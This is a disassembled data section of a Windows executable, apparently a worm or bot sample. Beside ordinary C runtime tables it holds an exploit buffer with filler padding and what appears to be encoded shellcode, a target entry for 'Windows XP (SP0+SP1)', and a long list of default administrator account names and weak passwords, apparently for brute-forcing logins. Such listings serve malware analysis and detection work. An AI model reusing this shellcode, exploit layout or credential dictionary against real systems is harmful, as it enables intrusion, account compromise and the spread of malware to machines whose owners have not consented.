aAbcdefghijklmn	db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
		align 4
		dd 21h dup(0)
byte_423290	db 0			; DATA XREF: sub_405019+102w
		align 4
		dd 0Fh dup(0)
		dd 10100000h, 6	dup(10101010h),	0
		dd 20200000h, 6	dup(20202020h),	2 dup(0)
		dd 20h,	10000000h, 10001000h, 2	dup(0)
		dd 20000000h, 20002000h, 10h, 0
		dd 20000000h, 2	dup(0)
		dd 200000h, 20000000h, 0
		dd 10101000h, 5	dup(10101010h),	10101000h, 10101010h, 6	dup(20202020h)
		dd 20202000h, 20202020h, 20h, 0
byte_423398	db 0			; DATA XREF: sub_405019+11Ew
		align 4
		dd 0Fh dup(0)
		dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
		dd 77767574h, 7A7978h, 0
		dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
		dd 57565554h, 5A5958h, 0
		dd 83000000h, 0
		dd 9A0000h, 9E009Ch, 2 dup(0)
		dd 8A0000h, 0FF8E008Ch,	2 dup(0)
		dd 0AA0000h, 2 dup(0)
		dd 0B500h, 0BA0000h, 0
		dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
		dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
		dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
		dd 9FDEDDDCh
dword_423498	dd 0A22980h		; DATA XREF: sub_402ADF+41r
					; sub_404D50+4Cr ...
byte_42349C	db 1			; DATA XREF: sub_404E6E+E3r
		db 2, 4, 8
dword_4234A0	dd 3A4h			; DATA XREF: sub_404E6E:loc_404EAAr
dword_4234A4	dd 82798260h		; DATA XREF: sub_404E6E+12Br
		dd 21h,	0
dword_4234B0	dd 0DFA6h		; DATA XREF: sub_404E6E+C6r
		align 8
		dd 0A5A1h, 0
		dd 0FCE09F81h, 0
		dd 0FC807E40h, 0
		dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE40h, 0
		dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE41h, 0
		dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
		dd 0FE81h, 0
		dd 0FEA17E40h, 0
		dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
		dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
		dd offset dword_41DF50+4
dword_423594	dd 0FFFFFFFEh		; DATA XREF: sub_402ADF+2Cr
					; sub_402ADF+4Cr ...
dword_423598	dd 43h,	0		; DATA XREF: sub_4051D1:loc_4052CEo
					; sub_405311:loc_40535Co ...
dword_4235A0	dd 2, 15h dup(0)	; DATA XREF: sub_405423+28o
					; sub_405765+DAo ...
		dd offset dword_423598
		dd 3 dup(0)
		dd offset dword_423598
		dd 3 dup(0)
		dd offset dword_423598
		dd 3 dup(0)
		dd offset dword_423598
		dd 3 dup(0)
		dd offset dword_423598
		dd 3 dup(0)
		dd 2 dup(1), 3 dup(0)
		dd offset off_423F38
		dd 2 dup(0)
off_423668	dd offset asc_41DD50	; DATA XREF: sub_40F52F+Dr
					; sub_40F5AC+Dr ...
					; "	    (((((		   H"
		dd offset dword_41E158+80h
		dd offset dword_41E158+200h
		dd offset off_423E78
off_423678	dd offset dword_4235A0	; DATA XREF: sub_402ADF+24r
					; sub_405461+4Er ...
		dd 1
off_423680	dd offset dword_4235A0	; DATA XREF: sub_40AA06+17o
		dd offset dword_423070
dword_423688	dd 0Eh			; DATA XREF: sub_4054D7+13r
					; sub_405543+13r ...
dword_42368C	dd 0Dh			; DATA XREF: sub_4054D7+1r
					; sub_4054D7+1Er ...
dword_423690	dd 1			; DATA XREF: sub_405B48:loc_405B4Er
dword_423694	dd 16h			; DATA XREF: sub_405B48:loc_405B69r
		dd 2 dup(2), 3,	2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
		dd 9, 0Ch, 0Ah,	7, 0Bh,	8, 0Ch,	16h, 0Dh, 16h, 0Fh, 2
		dd 10h,	0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h,	2, 41h
		dd 0Dh,	43h, 2,	50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
		dd 59h,	0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h,	9, 6, 16h
		dd 80h,	0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
		dd 29h,	9Eh, 0Dh, 0A1h,	2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
		dd 11h,	0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4237F8	dd 0Ch			; DATA XREF: sub_405B83+9o
dword_4237FC	dd 8			; DATA XREF: sub_405B96+9o
off_423800	dd offset dword_427458	; DATA XREF: sub_405C31:loc_405C6Ew
					; sub_405C7A+8o ...
dword_423804	dd 1			; DATA XREF: sub_405C31:loc_405C3Ar
		dd offset dword_427470
		dd 1, 2	dup(0)
		dd offset dword_427488
		dd 1, 4274A0h, 1, 2 dup(0)
		dd offset dword_4274B8
		dd 1, 4274D0h, 1, 4274E8h, 1, 2	dup(0)
		dd offset dword_427500
		dd 1, 0A24A68h,	0
		dd offset dword_427518
		dd 1, 427530h, 1, 427548h, 1, 2	dup(0)
		dd offset dword_427560
		dd 1, 427578h, 1, 427590h, 1, 0A24A48h,	21h dup(0)
dword_423920	dd 10h			; DATA XREF: sub_405C7A+2Ao
					; sub_405C7A+4Ao
off_423924	dd offset aNull_0	; DATA XREF: sub_406D87:loc_407275r
					; sub_406D87+7E7r
					; "(null)"
off_423928	dd offset aNull		; DATA XREF: sub_406D87+433r
					; "(null)"
		align 10h
off_423930	dd offset sub_407E9A	; DATA XREF: sub_407C0D+Er
					; sub_407EC9+45w
		align 10h
		dd offset dword_41D310
		align 10h
off_423950	dd offset dword_435420	; DATA XREF: sub_408434o
					; sub_40843A+52o ...
		align 8
		dd offset dword_435420
		dd 101h
dword_423960	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40843A+74o
		dd 1000h, 4 dup(0)
		dd 2, 0FFFFFFFEh, 6 dup(0)
		dd 2, 0FFFFFFFEh, 7 dup(0)
dword_4239C0	dd 3, 0			; DATA XREF: sub_40843A+A4o
		dd 1000h, 79h dup(0)
dword_423BB0	dd 8 dup(0)		; DATA XREF: sub_40850B+Do
					; sub_40855D+Do
dword_423BD0	dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA	XREF: sub_4035C7:loc_403663o
					; sub_4035C7:loc_4036A8o ...
dword_423C00	dd 2			; DATA XREF: sub_409E64:loc_409E70r
off_423C04	dd offset aR6002FloatingP ; DATA XREF: sub_409E64:loc_409F94r
					; "R6002\r\n- floating point not loaded\r\n"
		dd 8, 41DAA4h, 9, 41DA78h, 0Ah,	41D9E0h, 10h, 41D9B4h
		dd 11h,	41D984h, 12h, 41D960h, 13h, 41D934h, 18h, 41D8FCh
		dd 19h,	41D8D4h, 1Ah, 41D89Ch, 1Bh, 41D864h, 1Ch, 41D83Ch
		dd 1Eh,	41D81Ch, 1Fh, 41D7B8h, 20h, 41D780h, 21h, 41D688h
		dd 22h,	41D5E8h, 78h, 41D5D8h, 79h, 41D5C8h, 7Ah, 41D5B8h
		dd 0FCh, 41D5B4h, 0FFh,	41D5A4h
byte_423CB8	db 0			; DATA XREF: sub_40A15D:loc_40A4BEr
					; sub_40A15D+36Fr
		align 4
		dd 2Fh dup(0)
		dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2	dup(0)
dword_423DB8	dd 1B3Fh		; DATA XREF: sub_40ACF3+Dr
		align 10h
dword_423DC0	dd 0C0000005h, 0Bh, 0	; DATA XREF: sub_405616+1Do
					; sub_405765+6Eo
		dd 0C000001Dh, 4, 0
		dd 0C0000096h, 4, 0
		dd 0C000008Dh, 8, 0
		dd 0C000008Eh, 8, 0
		dd 0C000008Fh, 8, 0
		dd 0C0000090h, 8, 0
		dd 0C0000091h, 8, 0
		dd 0C0000092h, 8, 0
		dd 0C0000093h, 8, 0
dword_423E38	dd 3			; DATA XREF: sub_40ADC4+A1r
					; sub_40ADC4+C0r ...
dword_423E3C	dd 7			; DATA XREF: sub_40ADC4+A7r
					; sub_40ADC4+C6r ...
		dd 78h
dword_423E44	dd 0Ah			; DATA XREF: sub_40ADC4+22r
					; sub_40E098+4r
		dd offset dword_41D310
		dd offset sub_40B4CD
off_423E50	dd offset off_41D39C	; DATA XREF: sub_40BDB6+128o
					; _1fieagrn:00420FC8o ...
		align 8
a_?avbad_except	db '.?AVbad_exception@std@@',0
		dd offset asc_41DD50	; "	    (((((		   H"
		dd offset dword_41DF50+2
off_423E78	dd offset aSun		; DATA XREF: sub_4051D1+D9o
					; .data:00423674o
					; "Sun"
		dd offset aMon		; "Mon"
		dd offset aTue		; "Tue"
		dd offset aWed		; "Wed"
		dd offset aThu		; "Thu"
		dd offset aFri		; "Fri"
		dd offset aSat		; "Sat"
		dd offset aSunday	; "Sunday"
		dd offset aMonday	; "Monday"
		dd offset aTuesday	; "Tuesday"
		dd offset aWednesday	; "Wednesday"
		dd offset aThursday	; "Thursday"
		dd offset aFriday	; "Friday"
		dd offset aSaturday	; "Saturday"
		dd offset aJan		; "Jan"
		dd offset aFeb		; "Feb"
		dd offset aMar		; "Mar"
		dd offset aApr		; "Apr"
		dd offset aMay		; "May"
		dd offset aJun		; "Jun"
		dd offset aJul		; "Jul"
		dd offset aAug		; "Aug"
		dd offset aSep		; "Sep"
		dd offset aOct		; "Oct"
		dd offset aNov		; "Nov"
		dd offset aDec		; "Dec"
		dd offset aJanuary	; "January"
		dd offset aFebruary	; "February"
		dd offset aMarch	; "March"
		dd offset aApril	; "April"
		dd offset aMay		; "May"
		dd offset aJune		; "June"
		dd offset aJuly		; "July"
		dd offset aAugust	; "August"
		dd offset aSeptember	; "September"
		dd offset aOctober	; "October"
		dd offset aNovember	; "November"
		dd offset aDecember	; "December"
		dd offset aAm		; "AM"
		dd offset aPm		; "PM"
		dd offset aMmDdYy	; "MM/dd/yy"
		dd offset aDdddMmmmDdYyyy ; "dddd, MMMM	dd, yyyy"
		dd offset dword_41E158+300h
		dd 409h, 2 dup(1), 423E78h
dword_423F34	dd 2Eh			; DATA XREF: .data:off_423F38o
off_423F38	dd offset dword_423F34	; DATA XREF: sub_4051D1+14o
					; sub_40CA74+Br ...
off_423F3C	dd offset dword_427A58	; DATA XREF: sub_40CA74+1Dr
off_423F40	dd offset dword_427A58	; DATA XREF: sub_40CA74+2Fr
off_423F44	dd offset dword_427A58	; DATA XREF: sub_40CAB4+Cr
off_423F48	dd offset dword_427A58	; DATA XREF: sub_40CAB4+1Er
off_423F4C	dd offset dword_427A58	; DATA XREF: sub_40CAB4+30r
off_423F50	dd offset dword_427A58	; DATA XREF: sub_40CAB4+42r
off_423F54	dd offset dword_427A58	; DATA XREF: sub_40CAB4+54r
off_423F58	dd offset dword_427A58	; DATA XREF: sub_40CAB4+66r
off_423F5C	dd offset dword_427A58	; DATA XREF: sub_40CAB4+78r
		dd 2 dup(7F7F7F7Fh), 423F38h, 1, 2Eh, 1, 2 dup(0)
off_423F80	dd offset sub_4116FA	; DATA XREF: sub_40D94E:loc_40D952r
					; sub_40FABC+5w
off_423F84	dd offset sub_410DF6	; DATA XREF: sub_40FABC+Aw
off_423F88	dd offset sub_410DB4	; DATA XREF: sub_40FABC+14w
off_423F8C	dd offset sub_410DE8	; DATA XREF: sub_40FABC+1Ew
off_423F90	dd offset word_410D5E	; DATA XREF: sub_40FABC+28w
off_423F94	dd offset sub_4116FA	; DATA XREF: sub_40FABC+32w
off_423F98	dd offset sub_411674	; DATA XREF: sub_406D87+61Ar
					; sub_40FABC+37w
off_423F9C	dd offset sub_410D74	; DATA XREF: sub_409217+5F1r
					; sub_40FABC+41w
off_423FA0	dd offset sub_410CDE	; DATA XREF: sub_406D87+65Fr
					; sub_40FABC+4Bw
off_423FA4	dd offset sub_410C6D	; DATA XREF: sub_406D87+640r
					; sub_40FABC+55w
		align 10h
dword_423FB0	dd 19930520h, 3	dup(0)	; DATA XREF: sub_40F004+2o
					; sub_40F00D+2o
dword_423FC0	dd 2694h		; DATA XREF: sub_4101A5+3r
					; sub_4101F8+5Dr
		dd 9875h, 9873h, 0
dword_423FD0	dd 14h			; DATA XREF: sub_410107:loc_41010Fr
off_423FD4	dd offset aExp		; DATA XREF: sub_410107:loc_41017Fr
					; "exp"
		dd 1Dh,	41DC28h, 1Ah, 41DC18h, 1Bh, 41DC1Ch, 1Fh, 41EE20h
		dd 13h,	41EE18h, 21h, 41EE10h, 0Eh, 41DC10h, 0Dh, 41DC08h
		dd 0Fh,	41DBECh, 10h, 41EE08h, 5, 41EE00h, 1Eh,	41DBD0h
		dd 12h,	41DBCCh, 20h, 41DBC8h, 0Ch, 41DBE4h, 0Bh, 41DBDCh
		dd 15h,	41EDF8h, 1Ch, 41DBD4h, 19h, 41EDF0h, 11h, 41EDE8h
		dd 18h,	41EDE0h, 16h, 41EDD8h, 17h, 41EDD0h, 22h, 41EDCCh
		dd 23h,	41EDC8h, 24h, 41EDC4h, 25h, 41EDBCh, 26h, 41EDB0h
dbl_4240B8	dq 1.797693134862316e308 ; DATA	XREF: sub_40FED1:loc_40FFA1r
					; sub_40FED1:loc_40FFA9r
		dd 0
		dd 0FFF80000h
dbl_4240C8	dq 1.797693134862316e308 ; DATA	XREF: sub_40FED1+89r
					; sub_40FED1+A4r ...
		dd 0
		dd 100000h, 0
		dd 80000000h
tbyte_4240E0	dt 2.3562723457267347066e313 ; DATA XREF: sub_410435+Br
					; sub_410435+1Er
		align 4
tbyte_4240EC	dt 1.9149954921904370718e-1233 ; DATA XREF: sub_410435+30r
		align 4
dword_4240F8	dd 1			; DATA XREF: sub_41048B+1Cr
					; sub_41048B+4Cw
byte_4240FC	db 3			; DATA XREF: sub_41056E+1Br
					; sub_41056E:loc_4105ACr
		align 10h
		dd 7080h, 1, 0FFFFF1F0h, 0
dword_424110	dd 545350h, 0Fh	dup(0)	; DATA XREF: .data:00424190o
dword_424150	dd 544450h, 0Fh	dup(0)	; DATA XREF: .data:00424194o
		dd offset dword_424110
		dd offset dword_424150
		dd 0FFFFFFFFh, 2 dup(0)
		dd 0FFFFFFFFh, 2 dup(0)
		dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h,	0B5h, 0D4h, 0F3h
		dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
		dd 96h,	0B4h, 0D3h, 0F2h, 110h,	12Fh, 14Dh, 16Ch
dword_424218	dd 2			; DATA XREF: sub_41088C+13r
					; sub_41088C+4Fr ...
		align 10h
dword_424220	dd 0FFFFFFFEh		; DATA XREF: sub_4117FA:loc_411813r
dword_424224	dd 0FFFFFFFEh		; DATA XREF: sub_41088C+1Br
					; sub_41088C:loc_4108B5r ...
		align 10h
dword_424230	dd 400h			; DATA XREF: sub_411D19:loc_4120BDr
					; sub_411D19+44Dr
dword_424234	dd 0FFFFFC01h		; DATA XREF: sub_411D19:loc_411E88r
dword_424238	dd 35h			; DATA XREF: sub_411D19+78r
					; sub_411D19+176r ...
dword_42423C	dd 0Bh			; DATA XREF: sub_411D19:loc_412024r
					; sub_411D19+3AAr ...
dword_424240	dd 40h			; DATA XREF: sub_411D19+519r
dword_424244	dd 3FFh			; DATA XREF: sub_411D19+452r
					; sub_411D19:loc_41217Cr
dword_424248	dd 80h			; DATA XREF: sub_41225B:loc_4125FFr
					; sub_41225B+44Dr
dword_42424C	dd 0FFFFFF81h		; DATA XREF: sub_41225B:loc_4123CAr
dword_424250	dd 18h			; DATA XREF: sub_41225B+78r
					; sub_41225B+176r ...
dword_424254	dd 8			; DATA XREF: sub_41225B:loc_412566r
					; sub_41225B+3AAr ...
dword_424258	dd 20h			; DATA XREF: sub_41225B+519r
dword_42425C	dd 7Fh			; DATA XREF: sub_41225B+452r
					; sub_41225B:loc_4126BEr
dword_424260	dd 2 dup(0)		; DATA XREF: sub_41279D+363o
					; sub_412E61+18Eo
		dd 4002A000h, 2	dup(0)
		dd 4005C800h, 2	dup(0)
		dd 4008FA00h, 2	dup(0)
		dd 400C9C40h, 2	dup(0)
		dd 400FC350h, 2	dup(0)
		dd 4012F424h, 0
		dd 80000000h, 40169896h, 0
		dd 20000000h, 4019BEBCh, 0
		dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
		dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
		dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
		dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh,	40D3C278h
		dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
		dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
		dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
		dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h,	0A0AEA60Eh
		dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
		dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
		dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h,	5D25D88Bh
		dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
		dd 52028A20h, 7525C460h, 0
dword_4243C0	dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
					; DATA XREF: sub_41279D+37Ao
					; sub_412E61+1B3o
		dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h,	652CD3C3h
		dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h,	3FEEA7C5h
		dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h,	94D5E57Ah
		dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh,	0E15B4C2Fh
		dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
		dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h,	313BBABCh
		dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h,	8D2FEED7h
		dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
		dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
		dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
		dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh,	3B03A686h
		dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h,	0EE32DB23h
		dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h,	11B268E2h
		dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
		dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh,	0BF3C9157h
		dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h,	9FDE2DE4h
		dd 4C8D2CEh, 0AD8A6DDh,	0
		dd offset aBadAllocation ; "bad	allocation"
		dd offset dword_41EF28
dword_424528	dd 4Eh			; DATA XREF: sub_4022D6+81o
					; sub_4022D6+C8r ...
		dd 7 dup(0)
dword_424548	dd 8Bh			; DATA XREF: sub_4022D6+3FEr
					; sub_4028D4+77r ...
dword_42454C	dd 0			; DATA XREF: sub_4028D4:loc_402925r
					; sub_41ACC3+A8r ...
off_424550	dd offset sub_41AFA7	; DATA XREF: sub_413DDD+20Cr
					; sub_413DDD+31Dr ...
		dd 4Dh,	7 dup(0)
		dd 599h, 0
		dd offset sub_41B751
		dd 53h,	7 dup(0)
		dd 0B97h, 0
		dd offset sub_41ACC3
		dd 0Bh dup(0)
		dd offset aBadAllocatio_0 ; "bad allocation"
		dd offset aBadAllocatio_1 ; "bad allocation"
dword_4245E0	dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41ACC3+7Fo
		dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
		dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
		dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh	dup(64646464h)
		dd 1016464h, 40h dup(65656565h), 66010165h, 40h	dup(66666666h)
		dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
		dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
		dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
		dd 6C6C6C01h, 8	dup(6C6C6C6Ch),	41416C6Ch, 100D06EBh, 6D6D501Eh
		dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
		dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
		dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
		dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h,	0AF5B8DF3h
		dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
		dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
		dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
		dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h,	85773449h
		dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh,	0D43C8A9Bh
		dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh,	78281EB8h
		dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
		dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
		dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
		dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h,	2C47A345h
		dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
		dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
		dd 4838E43h, 5180BD0Ch,	0EFAF269Ah, 0D87B5338h,	78A9269Bh
		dd 877FD918h
aMmmmmmmmmmmmmm	db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
		align 4
byte_4257F4	db 0			; DATA XREF: sub_4148F8:loc_4149CCr
					; sub_4148F8:loc_414AE5r
a__		db 0Ah
		db 0Dh,'\_/.',0
dword_4257FC	dd 0EFFFC481h, 44FFFFh,	41EF84h	; DATA XREF: sub_41AFA7+321o
dword_425808	dd 42Ah			; DATA XREF: sub_41AFA7+2CBr
dword_42580C	dd 3E8h			; DATA XREF: sub_41AFA7+4D5r
dword_425810	dd 258h			; DATA XREF: sub_41AFA7+318r
		dd offset aWindowsXpSp0Sp ; "Windows XP	(SP0+SP1)"
		dd 2C6h, 264h, 0
dword_425824	dd 20804h		; DATA XREF: sub_41AFA7+4EEr
					; sub_41AFA7+4FAr ...
		dd offset aBadAllocatio_2 ; "bad allocation"
		dd offset aBadAllocatio_3 ; "bad allocation"
off_425830	dd offset byte_41EF1B	; DATA XREF: sub_41B751:loc_41B82Er
					; sub_41B751+EEo
		dd offset aAdministrator ; "administrator"
		dd offset aAdministrador ; "administrador"
		dd offset aAdministrateur ; "administrateur"
		dd offset aAdministrat	; "administrat"
		dd offset aAdmins	; "admins"
		dd offset aAdmin_0	; "admin"
		dd offset aAdm		; "adm"
		dd offset aPassword1	; "password1"
		dd offset aPassword	; "password"
		dd offset aPasswd	; "passwd"
		dd offset aPass1234	; "pass1234"
		dd offset aPass		; "pass"
		dd offset aPwd		; "pwd"
		dd offset a007		; "007"
		dd offset a1		; "1"
		dd offset a12		; "12"
		dd offset a123		; "123"
		dd offset a1234		; "1234"
		dd offset a12345	; "12345"
		dd offset a123456	; "123456"
		dd offset a1234567	; "1234567"
		dd offset a12345678	; "12345678"
		dd offset a123456789	; "123456789"
		dd offset a1234567890	; "1234567890"
		dd offset a2000		; "2000"
		dd offset a2001		; "2001"
		dd offset a2002		; "2002"
		dd offset a2003		; "2003"
		dd offset a2004		; "2004"
		dd offset aTest		; "test"
		dd offset aGuest	; "guest"
		dd offset aNone		; "none"
		dd offset aDemo		; "demo"
		dd offset aUnix		; "unix"
		dd offset aLinux	; "linux"
		dd offset aChangeme	; "changeme"
		dd offset aDefault	; "default"
		dd offset aSystem_0	; "system"
		dd offset aServer	; "server"
		dd offset aRoot_0	; "root"
		dd offset aNull_1	; "null"
		dd offset aQwerty	; "qwerty"
		dd offset aMail		; "mail"
		dd offset aOutlook	; "outlook"
		dd offset aWeb		; "web"
		dd offset aWww		; "www"
		dd offset aInternet	; "internet"
		dd offset aAccounts	; "accounts"
		dd offset aAccounting	; "accounting"
		dd offset aHome		; "home"
		dd offset aHomeuser	; "homeuser"
		dd offset aUser		; "user"
		dd offset aOem		; "oem"
		dd offset aOemuser	; "oemuser"
		dd offset aOeminstall	; "oeminstall"
		dd offset aWindows	; "windows"
		dd offset aWin98	; "win98"
		dd offset aWin2k	; "win2k"
		dd offset aWinxp	; "winxp"
		dd offset aWinnt	; "winnt"
		dd offset aWin2000	; "win2000"
		dd offset aQaz		; "qaz"
		dd offset aAsd		; "asd"
		dd offset aZxc		; "zxc"
		dd offset aQwe		; "qwe"
		dd offset aBob		; "bob"
		dd offset aJen		; "jen"
		dd offset aJoe		; "joe"
		dd offset aFred		; "fred"
		dd offset aBill		; "bill"
		dd offset aMike		; "mike"
		dd offset aJohn		; "john"
		dd offset aPeter	; "peter"
		dd offset aLuke		; "luke"
		dd offset aSam		; "sam"
		dd offset aSue		; "sue"
		dd offset aSusan	; "susan"
		dd offset aPeter_0	; "peter"
		dd offset aBrian	; "brian"
		dd offset aLee		; "lee"
		dd offset aNeil		; "neil"
		dd offset aIan		; "ian"
		dd offset aChris	; "chris"
		dd offset aEric		; "eric"
		dd offset aGeorge	; "george"
		dd offset aKate		; "kate"
		dd offset aBob_0	; "bob"
		dd offset aKatie	; "katie"
